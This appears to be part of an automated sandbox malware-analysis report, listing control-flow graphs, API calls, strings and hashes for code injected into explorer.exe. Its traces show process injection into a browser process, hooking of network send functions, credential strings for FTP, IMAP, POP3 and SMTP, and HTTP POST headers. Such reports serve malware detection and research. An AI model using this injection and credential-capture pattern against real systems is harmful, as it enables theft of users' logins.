                                                                                                        control_flow_graph 112 587728-587745 113 58774b-587758 112->113 114 58790d 112->114 115 58776a-58776f 113->115 114->114 116 587771 115->116 117 587760-587765 116->117 118 587773 116->118 119 587766-587768 117->119 120 587778-58777a 118->120 119->115 119->116 121 58777c-587781 120->121 122 587783-587787 120->122 121->122 122->120 123 587789 122->123 124 58778b-587792 123->124 125 587794-587799 123->125 124->120 124->125 126 5877a8-5877aa 125->126 127 58779b-5877a4 125->127 130 5877ac-5877b1 126->130 131 5877b3-5877b7 126->131 128 58781a-58781d 127->128 129 5877a6 127->129 132 587822-587825 128->132 129->126 130->131 133 5877b9-5877be 131->133 134 5877c0-5877c2 131->134 135 587827-587829 132->135 133->134 136 5877e4-5877f3 134->136 137 5877c4 134->137 135->132 138 58782b-58782e 135->138 140 587804-587811 136->140 141 5877f5-5877fc 136->141 139 5877c5-5877c7 137->139 138->132 144 587830-58784c 138->144 145 5877c9-5877ce 139->145 146 5877d0-5877d4 139->146 140->140 143 587813-587815 140->143 141->141 142 5877fe 141->142 142->119 143->119 144->135 147 58784e 144->147 145->146 146->139 148 5877d6 146->148 149 587854-587858 147->149 150 5877d8-5877df 148->150 151 5877e1 148->151 152 58785a-587870 LoadLibraryA 149->152 153 58789f-5878a2 149->153 150->139 150->151 151->136 155 587871-587876 152->155 154 5878a5-5878ac 153->154 156 5878ae-5878b0 154->156 157 5878d0-587900 VirtualProtect * 2 154->157 155->149 158 587878-58787a 155->158 159 5878b2-5878c1 156->159 160 5878c3-5878ce 156->160 161 587904-587908 157->161 162 58787c-587882 158->162 163 587883-587890 GetProcAddress 158->163 159->154 160->159 161->161 164 58790a 161->164 162->163 165 587899-58789c 163->165 166 587892-587897 163->166 164->114 166->155
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000586000.00000040.80000000.00040000.00000000.sdmp, Offset: 00586000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_586000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9aa14b8831401814b993d4702949b28b1fc12fe303dd09e449a95f8c380e47d
                                                                                                        • Instruction ID: b9292f1849370d818214069f7921c7e974f45da52ea72b643788fe9d4324b150
                                                                                                        • Opcode Fuzzy Hash: d9aa14b8831401814b993d4702949b28b1fc12fe303dd09e449a95f8c380e47d
                                                                                                        • Instruction Fuzzy Hash: 51512B7194C3954FD721AA78CC846B07FA0FB5A320B390679CDE5DB3C6E7949806C760
                                                                                                        Function 00582861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 167 582861-582871 GetProcessHeap RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 6c2106464e95c165856168a6822e5430a9c9714dbf69adc7a7aea2be642283d8
                                                                                                        • Instruction ID: 496ff1692720f1d884088ec23c25077b94733d5b11248955b342a092c5a522db
                                                                                                        • Opcode Fuzzy Hash: 6c2106464e95c165856168a6822e5430a9c9714dbf69adc7a7aea2be642283d8
                                                                                                        • Instruction Fuzzy Hash: 2FA01270500100FFEF4017A0FC0DF053A18A750B01F0010007509D40608960014CB721

                                                                                                        Non-executed Functions

                                                                                                        Function 00581819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582608: VirtualQuery.KERNEL32(00584434,?,0000001C), ref: 00582615
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0058184E
                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00581889
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00581919
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00583428,00000016), ref: 00581940
                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00581968
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00581978
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00581992
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0058199A
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 005819A8
                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 005819AF
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 005819C5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005819CC
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 005819E2
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00581A0C
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00581A1F
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A26
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A2D
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00581A41
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00581A58
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A65
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A6B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00581A71
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00581A74
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                        • API String ID: 1066286714-4141090125
                                                                                                        • Opcode ID: 3c8505a374fd48bfbe5d05a8228bdc2678623bfa7be79dfffb06eccb3cf5c11b
                                                                                                        • Instruction ID: 1c64704a992cb564274bbdf3f5e886d124368c4cfea73097e0ad1dd938871531
                                                                                                        • Opcode Fuzzy Hash: 3c8505a374fd48bfbe5d05a8228bdc2678623bfa7be79dfffb06eccb3cf5c11b
                                                                                                        • Instruction Fuzzy Hash: 59617A71205305AFD310EF65DC88E6BBFECFB99B54F000619FD49E2251DA70DA098BA6
                                                                                                        Function 0058263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0058265A
                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00582672
                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 0058267A
                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00582685
                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0058269F
                                                                                                        • wsprintfA.USER32 ref: 005826B6
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 005826CF
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005826D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                        • String ID: %02X
                                                                                                        • API String ID: 3341110664-436463671
                                                                                                        • Opcode ID: 96148755baa801799993183019ebfe819d3bc166ad659545df53c5e7e0af665a
                                                                                                        • Instruction ID: 33968c0587addd9af050fb319b1760f459a8787eeefac6f352f729e58fb46469
                                                                                                        • Opcode Fuzzy Hash: 96148755baa801799993183019ebfe819d3bc166ad659545df53c5e7e0af665a
                                                                                                        • Instruction Fuzzy Hash: 2B11FB71900108FFDB119B95EC8CEAEBFBCFB44B41F1040A5FA05E2160EA714F55AB60
                                                                                                        Function 00581B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 421 581b17-581b2c 422 581b2e 421->422 423 581b60-581b68 421->423 424 581b30-581b5e RtlMoveMemory 422->424 425 581b6a-581b6f 423->425 426 581bc3-581bcb 423->426 424->423 424->424 429 581bbe-581bc1 425->429 427 581c0b 426->427 428 581bcd-581bdf 426->428 432 581c0d-581c12 427->432 428->427 431 581be1-581bfe LdrProcessRelocationBlock 428->431 429->426 430 581b71-581b84 LoadLibraryA 429->430 434 581b8a-581b8f 430->434 435 581c15-581c17 430->435 431->427 433 581c00-581c04 431->433 433->427 436 581c06-581c09 433->436 437 581bb6-581bb9 434->437 435->432 436->427 436->431 438 581bbb 437->438 439 581b91-581b95 437->439 438->429 440 581b9c-581b9f 439->440 441 581b97-581b9a 439->441 442 581ba1-581bab GetProcAddress 440->442 441->442 442->435 443 581bad-581bb3 442->443 443->437
                                                                                                        APIs
                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00581B4E
                                                                                                        • LoadLibraryA.KERNEL32(?,00584434,00000000,00000000,74DF2EE0,00000000,00581910,?,?,?,00000001,?,00000000), ref: 00581B76
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00581BA3
                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00581BF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                        • String ID:
                                                                                                        • API String ID: 3827878703-0
                                                                                                        • Opcode ID: 817af7cdca3b2357fc263e7d1b6592a75340b568417bab2252c58523a5d76205
                                                                                                        • Instruction ID: 995781e4f0a1bedbd5aff6a3289bae2d74a07be2f092f66ea4dc81a2e68574c4
                                                                                                        • Opcode Fuzzy Hash: 817af7cdca3b2357fc263e7d1b6592a75340b568417bab2252c58523a5d76205
                                                                                                        • Instruction Fuzzy Hash: 9831A275700A11ABCB24DF29C884B66BBECBF15316B14456CEC86E7200E731EC46CBA8
                                                                                                        Function 00581332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0058109E,?,00581010), ref: 0058134A
                                                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0058109E,?,00581010), ref: 0058135B
                                                                                                        • wsprintfA.USER32 ref: 00581372
                                                                                                          • Part of subcall function 0058263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0058265A
                                                                                                          • Part of subcall function 0058263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00582672
                                                                                                          • Part of subcall function 0058263E: lstrlen.KERNEL32(?,00000000), ref: 0058267A
                                                                                                          • Part of subcall function 0058263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00582685
                                                                                                          • Part of subcall function 0058263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0058269F
                                                                                                          • Part of subcall function 0058263E: wsprintfA.USER32 ref: 005826B6
                                                                                                          • Part of subcall function 0058263E: CryptDestroyHash.ADVAPI32(?), ref: 005826CF
                                                                                                          • Part of subcall function 0058263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 005826D9
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00581389
                                                                                                        • GetLastError.KERNEL32 ref: 0058138F
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 005813A1
                                                                                                          • Part of subcall function 005824D5: GetCurrentProcessId.KERNEL32 ref: 005824E7
                                                                                                          • Part of subcall function 005824D5: GetCurrentThreadId.KERNEL32 ref: 005824EF
                                                                                                          • Part of subcall function 005824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005824FF
                                                                                                          • Part of subcall function 005824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0058250D
                                                                                                          • Part of subcall function 005824D5: CloseHandle.KERNEL32(00000000), ref: 00582566
                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 005813B8
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005813BF
                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 005813E4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 005813EB
                                                                                                          • Part of subcall function 00581DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00581E1D
                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0058141D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                        • API String ID: 706757162-1430290102
                                                                                                        • Opcode ID: 0bb66ba5770e3946892f3976f178e46020bafeb417d941dea1793bae22312685
                                                                                                        • Instruction ID: 954272d5e7eda4043ac7f2ddbaf55e800df2b65f8292578d56b7e01aa8b4ca32
                                                                                                        • Opcode Fuzzy Hash: 0bb66ba5770e3946892f3976f178e46020bafeb417d941dea1793bae22312685
                                                                                                        • Instruction Fuzzy Hash: D4314D31340615EBCF107FA1DC0EB6A3E69BB65B41F004014FE06BA2A1DB758A569BA5
                                                                                                        Function 00581647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 235 581647-58165a 236 581748-58174f 235->236 237 581660-581662 235->237 237->236 238 581668-58166b 237->238 238->236 239 581671-58167d lstrlen 238->239 240 581683-58168a lstrlen 239->240 241 581747 239->241 240->241 242 581690-5816a8 getpeername 240->242 241->236 242->241 243 5816ae-5816ca inet_ntoa htons 242->243 243->241 244 5816cc-5816d4 243->244 245 581708 244->245 246 5816d6-5816d9 244->246 249 58170d-58173c call 582861 wsprintfA call 5824ae 245->249 247 5816db-5816de 246->247 248 5816f3-5816f8 246->248 250 5816e0-5816e3 247->250 251 581701-581706 247->251 248->249 249->241 259 58173e-581745 call 582843 249->259 253 5816fa-5816ff 250->253 254 5816e5-5816ea 250->254 251->249 253->249 254->248 256 5816ec-5816f1 254->256 256->241 256->248 259->241
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                        • API String ID: 3379139566-1703351401
                                                                                                        • Opcode ID: 5f794ee005dc322a0f11f18b01f6c7db63a7071dd3c08ff5805d5aa4a46c8ba7
                                                                                                        • Instruction ID: c5b6de83a1d7052998389a6eefc1ec29d8765dfd86f4c45ba62699961efa8f48
                                                                                                        • Opcode Fuzzy Hash: 5f794ee005dc322a0f11f18b01f6c7db63a7071dd3c08ff5805d5aa4a46c8ba7
                                                                                                        • Instruction Fuzzy Hash: 6A21AE36A00609ABDF107EB98C889BE7EADFB55741F084079ED05F3211DA30CE029BA4
                                                                                                        Function 00581752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 267 581752-581774 GetModuleHandleA GetProcAddress 268 5817c1-5817c6 267->268 269 581776-5817c0 RtlZeroMemory * 4 267->269 269->268
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00581539,?,?,?,0058144B,?), ref: 00581763
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0058176A
                                                                                                        • RtlZeroMemory.NTDLL(00584228,00000104), ref: 00581788
                                                                                                        • RtlZeroMemory.NTDLL(00584118,00000104), ref: 00581790
                                                                                                        • RtlZeroMemory.NTDLL(00584330,00000104), ref: 00581798
                                                                                                        • RtlZeroMemory.NTDLL(00584000,00000104), ref: 005817A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                        • API String ID: 1490332519-278825019
                                                                                                        • Opcode ID: be9519ac6f290a0ce88af6d20fbeed697690a8aa55122e6efcaeeb67cdd7fa2e
                                                                                                        • Instruction ID: c86bcc565f6672d9d7e28d39636372a27c09517eadef23050a642bc2c9986d8c
                                                                                                        • Opcode Fuzzy Hash: be9519ac6f290a0ce88af6d20fbeed697690a8aa55122e6efcaeeb67cdd7fa2e
                                                                                                        • Instruction Fuzzy Hash: F8F0823678032D73C22032EABC0EC5BBE5CEA61FA67020151BE05B3291D99569008FB4
                                                                                                        Function 005824D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 005824E7
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 005824EF
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 005824FF
                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0058250D
                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0058252C
                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 0058253C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0058254B
                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0058255B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00582566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1467098526-0
                                                                                                        • Opcode ID: af3faf389965807ac9bcc81fab5667ac676848d0ef0ef5d0dc1e22113c23d6bb
                                                                                                        • Instruction ID: ba8a5330c016a3e46ca22d25c825e4d54f3bc4d4804e10ca307d429c65fa23b8
                                                                                                        • Opcode Fuzzy Hash: af3faf389965807ac9bcc81fab5667ac676848d0ef0ef5d0dc1e22113c23d6bb
                                                                                                        • Instruction Fuzzy Hash: 08113CB1444201EBD701AF61AC4DB6EBFA8FB95B01F144529FE41B6150E7318A09ABA3
                                                                                                        Function 00581F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 281 581f4a-581fa5 call 5822b8 call 582861 call 5827e2 call 582374 290 581fc0-581fcc 281->290 291 581fa7-581fbe 281->291 294 581fd0-581fd2 290->294 291->294 295 581fd8-58200f RtlZeroMemory 294->295 296 5822a6-5822b5 call 582843 294->296 300 58229e-5822a5 295->300 301 582015-582030 295->301 300->296 302 582062-582074 301->302 303 582032-582043 call 5822e5 301->303 310 582078-58207a 302->310 308 582045-582054 303->308 309 582056 303->309 313 582058-582060 308->313 309->313 311 58228b-582291 310->311 312 582080-5820dc call 582731 310->312 316 58229a 311->316 317 582293-582295 call 582843 311->317 321 5820e2-5820e7 312->321 322 582284 312->322 313->310 316->300 317->316 323 5820e9-5820fa 321->323 324 582101-58212f call 582861 wsprintfW 321->324 322->311 323->324 327 582148-58215f 324->327 328 582131-582133 324->328 333 58219e-5821b8 327->333 334 582161-582197 call 582861 wsprintfW 327->334 329 582134-582137 328->329 331 582139-58213e 329->331 332 582142-582144 329->332 331->329 335 582140 331->335 332->327 339 5821be-5821d1 333->339 340 582261-582277 call 582843 333->340 334->333 335->327 339->340 344 5821d7-5821ed call 582861 339->344 347 582279-58227b call 582843 340->347 348 582280 340->348 350 5821ef-5821fa 344->350 347->348 348->322 352 5821fc-582209 call 582826 350->352 353 58220e-582225 350->353 352->353 357 582229-582236 353->357 358 582227 353->358 357->350 359 582238-58223c 357->359 358->357 360 58223e 359->360 361 582256-58225d call 582843 359->361 362 58223e call 582815 360->362 361->340 364 582243-582250 RtlMoveMemory 362->364 364->361
                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                          • Part of subcall function 005827E2: lstrlen.KERNEL32(005840DA,?,00000000,00000000,00581F86,74DE8A60,005840DA,00000000), ref: 005827EA
                                                                                                          • Part of subcall function 005827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,005840DA,00000001,00000000,00000000), ref: 005827FC
                                                                                                          • Part of subcall function 00582374: RtlZeroMemory.NTDLL(?,00000018), ref: 00582386
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00581FE2
                                                                                                        • wsprintfW.USER32 ref: 0058211B
                                                                                                        • wsprintfW.USER32 ref: 00582186
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00582250
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                        • Opcode ID: 359da583099a54202c89cf71f7f7058854614c8eadef9d22798a69e5a4c108f7
                                                                                                        • Instruction ID: ed66d1a5eb4fb1c91f076f3b9672d4b1c0eec33bb49eb97d40144693503d33b5
                                                                                                        • Opcode Fuzzy Hash: 359da583099a54202c89cf71f7f7058854614c8eadef9d22798a69e5a4c108f7
                                                                                                        • Instruction Fuzzy Hash: 1EA14D75608305AFD710EF64D889A2BBFE9FB98740F10492DFD86E3251DA70DA08DB52
                                                                                                        Function 005825AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 414 5825ad-5825c9 OpenProcess 415 5825cb-5825da IsWow64Process 414->415 416 582600-582607 414->416 417 5825dc-5825ec IsWow64Process 415->417 418 5825f7 415->418 419 5825f9-5825fa CloseHandle 417->419 420 5825ee-5825f5 417->420 418->419 419->416 420->419
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00581287), ref: 005825BF
                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 005825D1
                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 005825E4
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005825FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                        • String ID: microsoftedgecp.exe
                                                                                                        • API String ID: 331459951-1475183003
                                                                                                        • Opcode ID: 65a8fae8f1c09d287f01033bb0e34ece0c03d54d1a021fc76a680fe54c0f2e67
                                                                                                        • Instruction ID: 20cfa8eceb7fe2ef8ea239e19653a843a62c49a65f2ebdc32254858e2b3f880d
                                                                                                        • Opcode Fuzzy Hash: 65a8fae8f1c09d287f01033bb0e34ece0c03d54d1a021fc76a680fe54c0f2e67
                                                                                                        • Instruction Fuzzy Hash: DEF06D71946618FFDB109F909D888AE7FACEB01651F14126AED10B6140D7314F08B7A0

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
